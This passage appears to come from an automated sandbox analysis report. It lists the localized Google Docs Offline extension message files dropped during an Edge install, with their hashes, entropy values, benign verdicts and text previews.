                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\nl\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):914
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                                                                                        MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                                                                                        SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                                                                                        SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                                                                                        SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\no\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):878
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                                                                                        MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                                                                                        SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                                                                                        SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                                                                                        SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\pa\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2766
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                                                                                        MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                                                                                        SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                                                                                        SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                                                                                        SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\pl\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):978
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                                                                                        MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                                                                                        SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                                                                                        SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                                                                                        SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):907
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                                                                                        MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                                                                                        SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                                                                                        SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                                                                                        SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\pt_PT\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):914
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                                                                                        MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                                                                                        SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                                                                                        SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                                                                                        SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\ro\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):937
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                                                                                        MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                                                                                        SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                                                                                        SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                                                                                        SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\ru\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1337
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                                                                                        MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                                                                                        SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                                                                                        SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                                                                                        SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\si\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2846
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                                                                                        MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                                                                                        SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                                                                                        SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                                                                                        SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\sk\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):934
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                                                                                                        MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                                                                                                        SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                                                                                                        SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                                                                                                        SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\sl\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):963
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                                                                                                        MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                                                                                                        SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                                                                                                        SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                                                                                                        SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\sr\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1320
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                                                                                                        MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                                                                                                        SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                                                                                                        SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                                                                                                        SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\sv\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
